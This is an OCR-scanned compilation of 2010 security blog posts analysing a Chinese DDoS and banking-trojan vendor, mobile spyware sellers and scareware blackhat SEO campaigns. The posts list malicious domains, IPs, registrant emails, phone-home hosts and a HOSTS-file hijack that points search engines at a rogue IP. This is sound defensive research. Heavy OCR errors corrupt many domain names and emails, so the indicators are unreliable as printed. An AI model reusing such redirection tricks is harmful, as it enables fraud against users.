[51 ]Koobface Botnet Dissected in a Trend Micro Report 

[52] Movement on the Koobface Front - Part Two 

[53] Movement on the Koobface Front 

[54] Koobface - Come Out, Come Out, Wherever You Are 

[55] Dissecting Koobface Worm's Twitter Campaign 

This post has been reproduced from [56]Dancho 
Danchev's blog. Follow him [57Jon Twitter. 
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Inside a Commercial Chinese DIY DDoS Tool (2010-05- 
26 13:55) 

One of the most commonly used tactics by shady online 
enterprises wanting to position themselves as legitimate 

ones ([l]Shark2 - RAT or Malware? ), is to promote 
malicious software or Denial of Service attack tooks, as 
remote access control tools/stress testing tools. 

Chinese "vendors" of such releases are particularly 
interesting, since their front pages always position the tool 
as a 100 % legitimate one, whereas going through the 
documentation, and actually testing its features reveals its 
true malicious nature. Moreover, once the vendor starts 



















trusting you - like the one whose DDoS tool is profiled in this 
post - you're given access to the private section of their 
forum, where they are directly pitching you with DDoS 

for hire propositions, starting from $100 for 24 hours 
of non-stop flood. 

• Related post: [2] Massive SQL Injection Attacks - the 
Chinese Way 

In this post I'll review what's currently being promoted as 
"The World's Leading DDoS Testing System", which is 
basically an improved version of a well known " Netbot 
Attacker", an old school release whose source code 

([3]Localizing Open Source Malware; [4]Custom DDoS 
Capabilities Within a Malware; [5]Custom DDoS 
Attacks Within Popular Malware Diversifying) is greatly 
favored by Chinese hacktivists and script kiddies, based on 
the multiple modifications they've introduced in it using the 
original source code. 

467 

Interestingly, the "vendor" is offering value-added services in 
the form of managed command and control server changes, 
the typical managed binary obfuscation, as well as custom 
features, removal of features in an 

attempt to decrease the size of the binary, but most 
importantly, they use differentiated pricing methods for their 
tool. Educational institutions, small businesses and home 
office clients can get special prices. 

• Why would the vendor include anti sandboxing capabilities 
in the latest version of the tool? 



• Why would the vendor also include P2P spreading and USB 
spreading modules? 

Because the tool is anything but your typical stress testing 
tool. 

Perhaps, one of the most important developments 
regarding this vendor, is that this is among the few 
ex¬ 
amples that I'm aware of where [6]Chinese hackers 
known not to care about anything else but virtual 
goods, are vertically integrating by experimenting 
with early-state banking malware. 

An excerpt from the banking experiment: 

" MS-recorder to wear all the safety test shows the major 
B2C online banking security controls. Received after the first 
test colt extracting file, which has ma.exe procedures. As the 
tests are over. Please turn off antivirus software and security 
software testing. . . 

Wear all safety major B2C online banking security 
controls currently supports more than can be 
intercepted 

more than 160 online online payment platform And 
major online banking. After running ma.exe can log on to 
the respective online banking program AH pay pay pa I or 
procedures to test, test and test interception of information 
stored in the pony 

The same directory, Test will generate J!z-1, J!z-2, Jlz-3 ... 
folder, such files in the folder will be l.bmp, 2.bmp, 3.bmp ... 
picture, or there txt Notepad, view the. txt and picture, get 
the interception of data and information. Test window will 



prompt pony run, test interception of information larger, 
there is no written function. To solve the above problem, 
please purchase the official version, run silent, run 
automatically delete itself, no process at startup, had all 
killed, the interception of information 

Expected small size, with letters function. VIP version of the 
generator purchase one year of free updates, free to kill 
three months to buy the colt package. Set the FTP 
transmission method to send the interception of STMP FTP. 

Perfect information theft can steal all the passwords and 
related information, such as: QQ, ICQ, Yahoo Messenger, 

Vicq, Out Look, FiashFXP, PayPal, E-mail and pay pa I (no 
security control), Legend, mercenary legend, Journey to the 
West, etc. (include account number, area and other relevant 
information), of course, the same information on the page 
steal, such as: mail, forums, close protection, and other 
(including user name, password and other related 
information), or even playing in the diagram, Password chip 
can, because it can record the keyboard and mouse actions. 
It is worth mentioning that, no matter what way you enter 
the password (such as Paste from somewhere, then paste 
the part of the input part, the number before the 0, 
deliberately enter the wrong password first and then delete 
the wrong part, etc.) Adopted the "filters" which makes 
stealing the contents do not appear out of "junk" in precise 
steal... The correct password." 

Clearly, these folks are not just inspired to continue 
introducing new features within the tool, but are starting to 
realize the potential of the crime ware market, with the 
vendor itself representing a good example on how once 

it was allowed to continue operations, it's naturally evolving 
in the worst possible direction. The author of ZeuS, however, 
shouldn't feel endangered in any way. 



Screenshots of the DIY DDoS Platform, including the 
multiple versions offers, VIP, sample custom made 
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Detection rates for the publicly obtainable builders of 
multiple versions: 

- MS.exe - [7]Backdoor.Hupigon.AAAH - Result: 26/40 (65 %) 

- msn.exe - [8]Win32.BDSPoison.Cpd - Result: 36/41 (87.81 
%) 

- test.exe (crime ware experiment) - [9]Hacktool.Rootkit - 
Result: 24/41 (58.54 %) 

- msl.exe - [lOJBackdoor. Win32.BlackHole - Result: 13/41 
(31.71 %) 

- msl.exe - [ll]W32/Hupigon.gen227; 
Backdoor.Hupigon.AAAH - Result: 35/41 (85.37 %) 

Based on the profiling the localization of this tool to Chinese 
since 2007, the diversification of the DDoS at- 


tacks introduced in it by Chinese coders ([12]Localizing 
Open Source Malware; [13]Custom DDoS Capabilities 
Within a Malware; [14]Custom DDoS Attacks Within 
Popular Malware Diversifying), perhaps the most 
important conclusion that can be drawn is that, tolerating 
their activities in the long term results in the development of 
more sophisticated capabilities which can now be offered to 
a well established customer base. 

If Chinese hacktivists managed to take CNN.com offline 

([15]The DDoS Attack Against CNN.com; [16]Chinese 
Hacktivists Waging People's Information Warfare 
Against CNN) using nothing else but ping fiooders/iFrames 
loading multiple copies of the site, the collectivist response 
in a future incident using these much more sophisticated 
tools - 

sophisticated in sense of the diverse set of DDoS attacks 
offered - is prone to be much more effective. 

Related Chinese hacking scene/hacktivism coverage: 

[17] Locaiizing Open Source Malware 
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[18] Custom DDoS Capabilities Within a Malware 

[19] Custom DDoS Attacks Within Popular Malware 
Diversifying 

[20] The Fire Pack Exploitation Kit Localized to Chinese 
[21 JMPack and IcePack Localized to Chinese 

[22] Massive SQL Injection Attacks - the Chinese Way 

[23] A Chinese DIY Multi-Feature Malware 



[24JDIY Chinese Passwords Stealer 

[25] A Chinese Malware Downloader in the Wild 

[26] Chinese Hackers Attacking U.S Department of Defense 
Networks 

[27] Chinese Hacktivists Waging People's Information Warfare 
Against CNN 

[28] The DDoS Attack Against CNN.com 
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Spamvertised Client-Side Exploits Serving Adult 
Content Themed Campaign (2010-05-28 15:29) 

There's no such thing as free porn, unless there are client- 
side exploits in the unique value proposition's mix. 

A currently spamvertised campaign is doing exactly the 
same, in between relying on the recent [1JCVE-2010- 

0886 vulnerability. Let's dissect the campaign, and combine 
the assessment with historical OSINT data, given the fact 
that the 2nd phone back location, including the binary 
hosted there are currently down. 

• Key summary point: although the exploitation is taking 
place, the campaign is currently failing to drop actual 

binary, returning NOEXEFILE error message. The post will be 
updated once the situation changes. 

a 

This post has been reproduced from [2]Dancho 
Danchev's blog. Follow him [3Jon Twitter. 
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Summarizing Zero Day's Posts for May (2010-05-31 
18:40) 

The following is a brief summary of all of my posts at 

[lJZDNet's Zero Day for May, 2010. You [2Jean a iso go 

through 

[3] previous summaries, as well as subscribe to my 

[4] personal RSS feed, [5]Zero Day's main feed, or 

follow me on Twitter: 

Recommended reading: 

• [6]Shou\d a targeted country strike back at the cyber 
attackers? 

• [7/Hotmail’s new security features i/s Gmail's old security 
features 
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• [8/Study finds the average price for renting a botnet 

• [9/5 reasons why the proposed ID scheme for Internet 
users is a bad idea 

01. [10]Foxit Reader intros new Safe Reading feature 





02. [HJShould a targeted country strike back at the cyber 
attackers? 

03. [12]Malware Watch: iTunes gift certificates, Skype worm, 
fake CVs and greeting cards 

04. [13]Wardriving police: password protect your wireless, or 
face a fine 

05. [14]Research: 1.3 million malicious ads viewed daily 

06. [15]Malware Watch: Rogue Facebook apps, fake Amazon 
orders, and bogus Adobe updates 

07. [16]Hotmaii's new security features i/s Gmail's old 
security features 

08. [17]Study finds the average price for renting a botnet 

09. [18]5 reasons why the proposed ID scheme for Internet 
users is a bad idea 
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Vendor of Mobile Spying Apps Drives Biz Model 
Through DIY Generators (2010-06-03 15:09) 

It's always worth monitoring the developments in the 
commercial mobile spying apps space. In particular, the 

inevitable customerization/customization of their services. 

A shady vendor of such applications, is attempting to 
migrate from the mass market model of competing ven- 

























dors, by offering its potential customers to ability to 
generate their own .sis files, for the spying app targeting 
Symbian OS 9 platform. The DIY features also include [l]the 
ability to self sign their own certificates. The price tag? 

A hefty price tag of £3000, and no refunds offered. 
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What's their true motivation behind the release of the DIY 
generation tool? it appears that they are primarily 

interested with scaling their business operations, allowing 
potential resellers the option to automatically generate the 
spying apps. Although the self-signing certificate option is 
interesting, mobile [2]maiware authors continue abusing 
Symbian Foundation's certificate signing process, 
surprisingly, by using bogus company names with no public 
reference of their existence. 

Thanks to the improving monetization models for mobile 
malware (e.g. 

calling/SMSing premium rate num¬ 
bers), mobile malware authors are only starting to 
realize/abuse the potential of the micro payments market 

segment. 

Related posts on mobile malware: 

[3] The future of mobile malware - digitally signed by 
Symbian? 

[4] Commerciai spying app for Android devices released 


[5] /'Hacked: jail broken iPhones compromised, $5 ransom 
demanded 

[6] New Symbian-based mobile worm circulating in the wild 

[7] New mobile malware silently transfers account credit 

[8] Transmitter.C mobile malware spreading in the wild 

[9] Transmitter.C Mobile Malware in the Wild 

[10] Proof of Concept Symbian Malware Courtesy of the 
Academic World 

[llJCommercializing Mobile Malware 

[12] Mobile Malware Scam iSexPlayer Wants Your Money 

Related posts on SMS Ransomware: 

[13] New ransomware locks PCs, demands premium SMS for 
removal 

[14] Mac OS X SMS ransomware - hype or real threat? 
[15JSMS Ransomware Displays Persistent Inline Ads 

[16] 6th SMS Ransomware Variant Offered for Sale 

[17] 5th SMS Ransomware Variant Offered for Sale 

[18] 4th SMS Ransomware Variant Offered for Sale 

[19] 3rd SMS Ransomware Variant Offered for Sale 
[20JSMS Ransomware Source Code Now Offered for Sale 
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Dissecting the Ongoing U.S Federal Forms Themed 
Biackhat SEO Campaign - Part Two (2010-06-03 18:56) 

UPDATED: Sunday, June 06, 2010. 






































The new redirections currently take place through 

www4. grea ta v4 O-td. co. cc/?uid=213 &pid=3 
&ttl=51545746f5c (93.190.141.40) and wwwl.avscaner- 
40pr.co.cc (217.23.5.52). 

Parked on 93.190.141.40, A549981, WorldStream are also: 

www3.justsoftl 2-td. co. cc 
www3. donrart55-td. co. cc 
www3. donrart5 7-td. co. cc 
www3. donrart59-td. co. cc 
www4. s win termz. cz. cc 
www3.goldvox-50td.xorg.pl 
www3.goldvox-60td.xorg.pl 
www3. goldvox-52td.xorg.pl 
www3. goldvox-54td.xorg.pl 
www3. goldvox-64td.xorg.pl 
www3. go Id vox-5 6 td.xorg.pl 
www3. goldvox-58td.xorg.pl 
wwwl. check-sa veyour-pc-no w. in 
wwwl. in-safe-keepmyzone. in 
wwwl. makesafe-scan-forsure. com 


Detection rate: 



- packupdatel07 213.exe - [ 1 ]Trojan.Fakealert.origin; 
Mai/Fake A V-B W - Result: 12/41 (29.27 %) 
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Upon execution, the sample phones back to: 

updatel.free-guard.com - 95.169.186.25; 188.124.5.64 - 
Email: gkook@checkjemail.nl 

update2.protect-helper.com - 78.159.108.170 - Email: 
gkook@checkjemail. nl 

secure2.protectzone.net - 91.207.192.24 - Email: 
gkook@checkjemail. nl 

securel.protect-zone.com - 209.212.147.241 - Email: 
gkook@checkjemail. nl 

securel.protect-zone.com - 209.212.147.241 - Email: 
gkook@checkjemail. nl 

www5.securitymasterav.com - 91.207.192.25 - Email: 
gkook@checkjemail. nl 

update2.free-guard.net - Email: gkook@checkjemail.nl 

report.land-protection.com - 188.124.7.156 - Email: 
gkook@checkjemaU. nl 

report.goodguardz.com - 93.186.124.94 - Email: 
gkook@checkjemaU. nl 

report.zoneguardland.com - 93.186.124.91 - Email: 
gkook@checkjemaU. nl 


reportl.stat-mx.xorg.pl - 109.196.132.41 - Email: 
gkook@checkjemaU. nl 

securel.protect-zone.com - 209.212.147.241 - Email: 
gkook@checkjemaii. nl 

74.125.45.100 

74.82.216.3 

Parked on 95.169.186.25 (AS31103, KEYWEB-AS); 
188.124.5.64 (A544565, VITAL TEKNOLOJI) are also: 

www3.justsoftl 1-td. co. cc 

www3.justsoftl 2-td. co. cc 

www4. s win termz. cz. cc 

www4. trustzonel 7-td.xorg.pl 

www3. coantys-41 td.xorg.pl 

www3. coantys-42td.xorg.pl 

www3.coantys-46td.xorg.pl 

www4. miymiy3. com 

updatel. free-guard. com 

useguard.com 

updatel. useguard. com 

www2. a vcleaner30-pd. co. cc 

wwwl. fa vorita v30-pd. co. cc 



www2. a vcleaner32-pd. co. cc 
ww\N 2. a vcleaner34-pd. co. cc 
wwwl. fa vorita v34-pd. co. cc 
www2. a vcleaner36-pd. co. cc 
wwwl. fa vorita v36-pd. co. cc 
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www3. a vprotector54-td.xorg.pl 
www3. a vprotector56-td.xorg.pl 
updatel. free-guard. com 
updatel.winsystemupdates.com 

Remember the massive blackhat SEO campaign using U.S 
Federal Forms themed keywords, which was exten¬ 
sively profiled in August, 2009? 

• [2]Blackhat SEO Campaign Hijacks U.S Federal Form 
Keywords, Serves Sea re ware 

• [3]U.S Federal Forms Blackhat SEO Themed 
Scareware Campaign Expanding 

• [4]Dissecting the Ongoing U.S Federal Forms 
Themed Blackhat SEO Campaign 

• [5]Koobface-Friendly Riccom LTD - AS29550 - 
(Finally) Taken Offline - multiple connections 


The cybercriminals behind it, never really stopped feeding 
new domains, including compromised ones, naturally 

diversifying the set of topics in order to serve sea re ware. 
Now that enough data is gathered, naturally exposing 

connections within the cybercrime ecosystem which would 
be communicated using the " perfect timing, perfect 
channel" philosophy, it's time to dissect the online 
campaign, expose the entire portfolio of domains involved, 
and, of course, take it down. 

What particularly interesting about this gang, is their clear 
understanding of QA (quality assurance) for the sake of 
increase 0P5EC (operational security). 

Just like the previous campaigns, each individual domain 
involved 

in the campaign is registered using a separate email, in the 
majority of cases it's an automatically registered one. 
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With or without the QA, there's no escape from the 
monetization vector - in this case, and like many other - 
sea re ware. 

Domains used in the blackhat SEO campaign, none of these 
are currently flagged as harmful: 

Hp5p8h.co.cc - Email: mijkzh@gmaii.com 

lus51n.co.cc - Email: mqxd2r2@gmail.com 

aifmydpuhv.eo.ee - Email: kent.attonis9140@yahoo.com 

amquijycpntb.co.ee - Email: volf.aittalal388@yahoo.com 



aqejhilmvb.co.cc - Email: 
amandeep. terrisse8102@yahoo. com 

arnepqjya.eo.ee - Email: vkpnzxn@gmaii.com 

bekqjcra.co.ee - Email: yaala.benardos7911@yahoo.com 

benyd.eo.ee - Email: Iexyb610@gmail.com 

bestdesision.eo.ee - Email: an9020@bk.ru 

bipilyqomyusvuhy.eo.ee - Email: 
eeclllw3xqul 9tr9wb@gmaii. com 

bjalumericz.co.ee - Email: 
diamond. aittaia4367@yahoo. com 

chammaope.co.ee - Email: wefergss@ukr.net 

coebfjqmkhsn.co.ee - Email: kent.attonis9140@yahoo.com 

comp-s.co.cc - Email: stasl4423321@mail.ru 

eynuqacjrtiz.co.ee - Email: ketina.tomsic2552@yahoo.com 

getmoney4me.co.cc - Email: finaiizerl2@maii.ru 

goumucnypuxuhyikzi.co.ee - Email: 
ekx7roq8p5hrd61tah@gmail. com 

hiokirygohxinugohu.eo.ee - Email: 
q88zh 7dwshibteg05l@gmail. com 

hryjhuklo.eo.ee - Email: fgyuhedgdrfghhio@ymail.com 

ibdumycp.co.ee - Email: madeiyn.ajail243@yahoo.com 

ifohviwihuuxitqoil.eo.ee - Email: 
bsowez9uspl u8cjyxp@gmail. com 



ifyfgybyuxisoffu.co.ee - Email: 
5nrg2bgm2og0cloxpf@gmail. com 

ihquyrvutyridyuwyj.eo.ee - Email: 
whlp9c5f0jwlvn5jlq@gmail. com 

ijojinhuxifykygysu.eo.ee - Email: 
Iq7s26iipq2sxbcyd9@gmail. com 

imdjrsfybna v. co. cc - Email: sarig. ajaye7737@yahoo. com 

incom-sale.co.cc - Email: wisha700_5@yahoo.com 

inoltoumydonulijuk.co.ee - Email: 
e6pgu8mamts6fco5ik@gmail. com 

iroqimcuohubizgooh.co.ee - Email: 
sku0cthz7ttgzwaqzw@gmail. com 

iwanti.eo.ee - Email: justtobebeauty@gmail.com 

iyqvogx.eo.ee - Email: do.co.io.k.oh.o.ngo.v.o@gmaii.com 

jepabhto.eo.ee - Email: festas.mciiseyl646@yahoo.com 

kiaxmh4.co.cc - Email: kiaxmh@kiaxmh.com 

kiboinikixuvquiiro.eo.ee - Email: 
5k2j7bnpxzgkoyibb0@gmail. com 

krghiqyiht.eo.ee - Email: ouhegtlx@yahoo.com 

kyogpylymypusulojo.co.ee - Email: 
rrykuqs44ilgf2xd6q@gmail. com 

ltcsiO.co.ee - Email: v9xodcm@gmail.com 



omsuimuhysjoujiqip.co.ee - Email. 
nattyxbfpvcaivauf6@gmaii. com 

opimuzxiyrxigoiwur.eo.ee - Email: 
ebiy9hwt817zs5m0wa@gmaii.com 

ostozuorypofitjuti.eo.ee - Email: 
2rdo8uwhl 4y5mqckl<h@gmail. com 
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pqusrzycd.co.ee - Email: adairicus.aijaia4749@yahoo.com 

ptvibnrjeayh.eo.ee - Email: 
miiiani. mccomrick3922@yahoo. com 

pubaxj.eo.ee - Email: runuk8976@gmail.com 

pucrsnihoqy.co.ee - Email: dalila.babusek8958@yahoo.com 

qbhomskuine.eo.ee - Email: 
keona. canose6839@yahoo. com 

qcumoyh.co.ee - Email: bethiah.mcglasky5891@yahoo.com 

qyczejdlita.co.ee - Email: 
a begail. woitkoski3075@yahoo. com 

ridcamybv.co.ee - Email: 

laurentius. diamandoglou5401@yahoo. com 

rithubmolnda.eo.ee - Email: 
adalynn.aiololo3070@yahoo.com 

riyvroiqfoydcilifo.co.ee - Email: 
irjghmpq7w9t0ah6rz@gmail. com 


rnoqzydjuia.co.cc - Email: ieuan.calcutt9416@yahoo.com 

rpdkjuaft.eo.ee - Email: worley. biernackal945@yahoo.com 

rybidlzck.co.ee - Email: ander.airwyk9339@yahoo.com 

ryiiyduiivuvdojo.eo.ee - Email: 
b5657927wcdn48k3u2@gmail. com 

rywutydymoxyodygyt.eo.ee - Email: 
e8fzpd2yzy4 w8hf7t4@gmail. com 
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sdemfjotuc.co.ee - Email: 
annemarie. bichan3685@yahoo. com 

search-portal.co.ee - Email: akhmadarroyan@gmail.com 

siycugufryyrkoylky.co.ee - Email: 
v5o 71 m4qiy5is0zcs3@gmail. com 

sounluolvuoxyqixky.co.ee - Email: 
ay2643zdi8kywwu444@gmail. com 

sprqucoatz.co.ee - Email: 
vindhya.periiean5722@yahoo. com 

ucywmuziboytylwi.co.ee - Email: 
m45267tiipj 7xk9n 71 @gmail. com 

unotufukujygugusto.eo.ee - Email: 
qe2m9sl abdvw02gl p3@gmaii. com 

upykhogupiybuwojyz.eo.ee - Email: 

7ea 7iulbkzmfp0grso@gmail. com 



usbokuycryocyjykqi.co.cc - Email: 

5fnuzbof36ugl 9/y7f@gmail. com 

vobyumfoodzygubuyv.co.ee - Email: 
mjkexe0d9gaqkzihlo@gmail. com 

xepepele969.co.cc - Email: bemumoro6654@gmaii.com 

xodovumuycguhyujip.co.ee - Email: 
zeqa6hr6kitwpt6eis@gmaii. com 

yfwiiwoqwipihovo.eo.ee - Email: 
87koy5ljr5j4oe9dcm@gmail. com 

ygitysbocysokuujok.co.ee - Email: 
qa0gvqsa8t3dr5u3yr@gmail. com 

ykraivec.co.ee - Email: wergr@ukr.net 

ynywyvtioxiloghoin.eo.ee - Email: 
g955emcus8z0dbfebs@gmail. com 

yourbestchose.co.ee - Email: daan900@bk.ru 

yzirukwoilokocpohi.co.ee - Email: 
scqnbtps908moi8rgx@gmail. com 
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The .co.cc domains portfolio responds to the following IPs, 
parked on them are also related malicious domains: 

69.163.236.70 

78.159.114.244 


82.146.50.101 


82.146.54.111 


82.146.50.156 

82.146.54.116 

82.146.54.118 

82.146.54.119 
82.146.54.122 
82.146.54.129 

82.146.50.183 
82.146.54.143 

82.146.50.184 
82.146.50.188 
82.146.54.150 
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82.146.50.193 

82.146.50.194 
82.146.50.213 
82.146.54.177 
82.146.51.237 
82.146.53.244 


82.146.54.62 



82.146.54.69 


82.146.54.84 

84.16.236.31 

84.16.236.32 
84.16.229.42 
89.149.202.106 
89.149.226.127 

89.149.201.224 
89.149.255.174 

89.149.255.20 

89.149.238.225 

89.149.255.21 
89.149.200.47 
89.149.237.83 
92.63.105.179 
92.63.105.191 
92.63.98.239 

94.76.205.176 

94.76.205.177 


94.76.205.178 



94.76.205.180 


94.76.205.182 

94.76.205.183 

94.76.205.184 
174.121.196.227 
174.120.128.62 
188.120.231.249 
205.234.222.169 
212.95.56.102 
212.95.56.104 
212.95.56.89 

212.95.56.92 

212.95.56.93 

212.95.56.95 

212.95.56.96 
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Compromised sites part of the blackhat SEO campaign: 

kleertjesenmooi. nl 
knapadvies. nl 


kruidendreef6 O.nl 


kruijspunt.nl 
ktf-texel.nl 
lali.nl 

laplanchette.nl 

lenzfilm.nl 

leuveld.nl 

liana-makeup, com 

I id a van velzensportmassage. nl 

Iief4kids. com 

logamklusmaster. nl 

lookingblueeye. nl 

luccie-007.nl 

lucmeubelbouw.nl 

lukasart.nl 

maakkennismetkennis.nl 
magisoft.be 
magnetenspecialist. nl 
mahu-services.nl 


maismoe.nl 



makaroni. info 


malena-team.nl 
maliebaanutrecht. nl 

Once the end user clicks on a link found within Google's 
index, a tiny .js checks the referrers (compromised 

_site.nl/directory/randomcontent.js) and the redirection takes 
place. For instance: 

- www3.donrart58-td.co.cc/ ?uid=213 &pid=3 
&ttl=21f4e73673b - 93.190.141.41 - Email: 
mail work. abc@gmaii. com 

- www2.uberguardzz6.com - 94.228.220.114 - Email: 
gkook@checkjemaii. nl 

- wwwl.favoritav31-pd.co.cc -188.124.5.66 - Email: 
mail work. abc@gmaii. com 

- www2.avdeaner44-pd.co.cc - 93.190.139.214 - Email: 
mail work. abc@gmaii. com 

Where do we know [6]the same campaigner (?uid=213 
&pid=3 &tti=21f4e73673b) from? 

From [7 ]related 

campaigns. 
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Parked on 93.190.141.41, donrart58-td.co.cc, A549981 
WorldStream are also: 


w w w3.j us tsoftl 1-td. co. cc 

www3. donrart56-td. co. cc 

wwwl.newav31-pr.co.cc 

www3.goldvox-51 td.xorg.pl 

www3.goldvox-61 td.xorg.pl 

www3.goldvox-53td.xorg.pl 

www3.goldvox-55td.xorg.pl 

www3. gold vox-5 7td.xorg.pl 

www3. goldvox-59td.xorg.pl 

wwwl.bestdefender-58p.xorg.pl 

www4.miymiy3.com -93.190.141.41 - Email: 
gkook@checkjemaU. nl 

www3.ruboidmon-60td.com - 93.190.141.41 - Email: 
gkook@checkjemaii. nl 
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Parked on 188.124.5.66, favoritav31-pd.co.cc, AS44565 
VITAL TEKNOLOJI are also: 

www2. a vcleaner31 -pd. co. cc 

www2. a vcleaner35-pd. co. cc 

www3. a vprotector51-td.xorg.pl 

www3. a vprotector53-td.xorg.pl 



www3. a vprotector55-td.xorg.pl 

www3. a vprotector5 7-td.xorg.pl 

www3.omgsaveit4.com - 74.118.194.76 - Email: 
gkook@checkjemaU. nl 

useguard.com - 95.169.186.25 - Email: 
gkook@checkjemaii. nl 

updatel.useguard.com - 95.169.186.25 - Email: 
gkook@checkjemaU. nl 

www4.miymiy2.net - Email: gkook@checkjemail.nl 
Parked on 95.169.186.25 , A531103, KEYWEB-AS are also: 

www3.justsoftl O-td. co. cc 
www4. free warezl O-td. co. cc 
www3.justsoftl 1-td. co. cc 
www3.justsoftl 2-td. co. cc 
www3. a vforyou23-td. co. cc 
www4. s win termz. cz. cc 
www4. trustzonel 6-td.xorg.pl 
www4. trustzonel 7-td.xorg.pl 
www4. trustzonel 9-td. xorg.pl 
www3. coantys-41 td.xorg.pl 
www3. vointuas-81 td.xorg.pl 



www3. coantys-42td.xorg.pl 
www3.coantys-46td.xorg.pl 
www4. miymiy3. com 
useguard.com 
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Detection rate: 

- packupdate 107 _213.exe - [8]TROJ_FRAUD.SMAF; 
Mai/FakeA V-AX - Result: 28/40 (70 %) 

Phones back to: 

updatel.useguard.com - 95.169.186.25 - Email: 
gkook@checkjemaii. nl 

update2.guardinuse.net - 78.159.108.171 - Email: 
gkook@checkjemaii. nl 

securel.protect-zone.com - 209.212.147.241 - Email: 
gkook@checkjemail. nl 

secure2.protectzone.net - 91.207.192.24 - Email: 
gkook@checkjemail. nl 

report.goodguardz.com - 93.186.124.94 - Email: 
gkook@checkjemaU. nl 

74.82.216.3/ncr - [9]interesting HOSTS file modification 

01 - Hosts: 74.125.45.100 4-open-davinci.com 

01 - Hosts: 74.125.45.100 securitysoftwarepayments.com 


01 - Hosts: 74.125.45.100 privatesecuredpaymerits, com 

01 - Hosts: 74.125.45.100 
secure.privatesecuredpayments. com 

01 - Hosts: 74.125.45.100 getantivirusplusnow.com 

01 - Hosts: 74.125.45.100 secure-pius-payments.com 

01 - Hosts: 74.125.45.100 
http://www. getantivirusplusnow. com 

01 - Hosts: 74.125.45.100 http://www.secure-plus- 
payments. com 

01 - Hosts: 74.125.45.100 http://www.getavplusnow.com 
01 - Hosts: 74.125.45.100 safebrowsing-cache.google.com 
01 - Hosts: 74.125.45.100 urs.microsoft.com 
01 - Hosts: 74.125.45.100 http://www.securesoftwarebill.com 
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01 - Hosts: 74.125.45.100 secure.paysecuresystem.com 

01 - Hosts: 74.125.45.100 paysoftbillsolution.com 

01 - Hosts: 74.125.45.100 protected.maxisoftwaremart.com 

01 - Hosts: 74.82.216.3 http://www.google.com 

01 - Hosts: 74.82.216.3 google.com 

01 - Hosts: 74.82.216.3 google.com.au 

01 - Hosts: 74.82.216.3 http://www.google.com.au 



01 - Hosts: 74.82.216.3 google.be 

01 - Hosts: 74.82.216.3 http://www.google.be 

01 - Hosts: 74.82.216.3 google.com.br 

01 - Hosts: 74.82.216.3 http://www.google.com.br 

01 - Hosts: 74.82.216.3 google, ca 

01 - Hosts: 74.82.216.3 http://www.google.ca 

01 - Hosts: 74.82.216.3 google, ch 

01 - Hosts: 74.82.216.3 http://www.google.ch 

01 - Hosts: 74.82.216.3 google.de 

01 - Hosts: 74.82.216.3 http://www.google.de 

01 - Hosts: 74.82.216.3 google.dk 

01 - Hosts: 74.82.216.3 http://www.google.dk 

01 - Hosts: 74.82.216.3 google.fr 

01 - Hosts: 74.82.216.3 http://www.google.fr 

01 - Hosts: 74.82.216.3 google.ie 

01 - Hosts: 74.82.216.3 http://www.google.ie 

01 - Hosts: 74.82.216.3 google.it 

01 - Hosts: 74.82.216.3 http://www.google.it 

01 - Hosts: 74.82.216.3 google.co.jp 

01 - Hosts: 74.82.216.3 http://www.google.co.jp 



01 - Hosts: 74.82.216.3 google.nl 

01 - Hosts: 74.82.216.3 http://www.google.nl 

01 - Hosts: 74.82.216.3 google.no 

01 - Hosts: 74.82.216.3 http://www.google.no 

01 - Hosts: 74.82.216.3 google, co.nz 

01 - Hosts: 74.82.216.3 http://www.google.co.nz 

01 - Hosts: 74.82.216.3 google.pl 

01 - Hosts: 74.82.216.3 http://www.google.pl 

01 - Hosts: 74.82.216.3 google.se 

01 - Hosts: 74.82.216.3 http://www.google.se 

01 - Hosts: 74.82.216.3 google.co.uk 

01 - Hosts: 74.82.216.3 http://www.google.co.uk 

01 - Hosts: 74.82.216.3 google.co.za 

01 - Hosts: 74.82.216.3 http://www.google.co.za 

01 - Hosts: 74.82.216.3 http://www.google-analytics.com 

01 - Hosts: 74.82.216.3 http://www.bing.com 

01 - Hosts: 74.82.216.3 search.yahoo.com 

01 - Hosts: 74.82.216.3 http://www.search.yahoo.com 

01 - Hosts: 74.82.216.3 uk.search.yahoo.com 

01 - Hosts: 74.82.216.3 ca.search.yahoo.com 



01 - Hosts: 74.82.216.3 de.search.yahoo.com 
01 - Hosts: 74.82.216.3 fr.search.yahoo.com 
01 - Hosts: 74.82.216.3 au.search.yahoo.com 
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What's so interesting about it anyway? 

Exact same modification was seen in "flOJKoobface 
Botnet's Scare- 

ware Business Model - Part Two ", in regard to the Google 
IP 74 . 125 . 45 . 100 . 

Take down actions are already taking place, updated will be 
posted as soon as new developments emerge. 

Related research on blackhat SEO campaigns: 

[llJThe ultimate guide to sea reware protection 

[12JA Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 

[13] Massive Sea reware Serving Blackhat SEO, the Koobface 
Gang Style 

[14] A Peek Inside the Managed Blackhat SEO Ecosystem 

[15] Dissecting a Swine Flu Black SEO Campaign 

[16] Massive Blackhat SEO Campaign Serving Sea reware 

[17] From Ukrainian Blackhat SEO Gang With Love 

[18] From Ukrainian Blackhat SEO Gang With Love - Part Two 



[19] From Ukraine with Sea re ware Serving Tweets, Bogus 
Linked I n/Scribd Accounts, and Biackhat SEO Farms 

[20] From Ukraine with Bogus Twitter, Linked!n and Seribd 
Accounts 

[21 ]Fake Web Hosting Provider - Front-end to Sea re ware 
Biackhat SEO Campaign at Blogspot 

This post has been reproduced from [22]Dancho 
Danchev's blog. Follow him [23Jon Twitter. 
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Dissecting the 100,000+ Scareware Serving Fake 
YouTube Pages Campaign (2010-06-08 21:49) 

Researchers from eSoft are reporting on [1]135,000 Fake 
YouTube pages currently serving scareware , in between 
using multiple monetization/traffic optimization tactics for 
the hijacked traffic. 

Based on the campaign's structure, it's pretty clear that the 
[2]template-ization of malware serving sites ([3]Part 
Two) is not dead. Let's dissect the campaign, it's structure, 
the monetization/traffic optimization tactics used, list all the 
domains+URLs involved, and establish multiple connections 
(in the face of AS6851, BKCNET "SiA" IZZi) to recent 
malware campaigns - cybercriminals are often customers of 
the same cybercrime-friendly provider. 
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The campaign is relying on a typical mix of compromised and 
purely malicious sites, but is using not just an identical 
template, but identical campaign structure, which remains 












pretty static for the time being. Upon visiting one of the sites 
and meeting the referrer requirement - Google works fine - 
the hardcoded preload.php loads, which is always pointing 
to the same IP, using a randomly generated code, which 
changes overtime - 91.188.60.126/?q=jzhaf - 

AS6851, BKCNET "SIA" IZZI 


inetnum: 91.188.60.0 - 91.188.60.255 
netname: ATECH-SAGADE 
descr: Sagade Ltd. 
descr: Latvia, Rezekne, Darzu 21 
